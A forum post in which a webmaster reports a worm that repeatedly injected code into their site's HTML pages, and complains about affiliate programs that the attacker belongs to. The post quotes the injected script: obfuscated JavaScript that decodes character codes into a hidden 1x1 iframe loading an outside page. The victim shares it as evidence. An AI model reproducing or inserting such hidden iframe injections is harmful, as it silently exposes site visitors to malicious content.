Hear me out, I'll have to spread this over a few posts because it'll max out the maximum word length.
I've had this problem (on and off) for a while. It took four seperate incidents before my webhost took it seriously and said that they had discovered a worm.
This is what has been mysteriously appearing in my html pages (but it doesn't happen to my php pages). I've only got two and a half thousand pages of html to now reupload...
Code:
<SCRIPT LANGUAGE="JavaScript">
<!--
function Decode(){var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!104!116!116!112!58!47!47!120!45!114!111!97!100!46!99!111!46!107!114!47!114!105!99!104!47!111!117!116!46!112!104!112!32!119!105!100!116!104!61!49!32!104!101!105!103!104!116!61!49!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}
//-->
</SCRIPT><SCRIPT LANGUAGE="JavaScript">
<!--
Decode();
//-->
</SCRIPT>
Also some hahahaha has been adding whole html pages to sub-directories at the same site. I'm unsure if both these attacks are related. But the motherfucker has a Nasty Dollars and a Top Bucks account.
When this first happened I contacted both. No word back from Nasty Dollars
Top Bucks got back to me and said: "I have sent a cease and desist notice to this webmaster. Please let me know of any further problems that you have."
Which was crazy. I had sent them to a forum thread which outlined the whole drama. They knew that it wasn't someone 'just' spamming. It was someone who had hacked into another persons webspace.
Since then I have noticed that Sapphic Cash is another affiliate program that this cockspanner is registered to.
To be continued...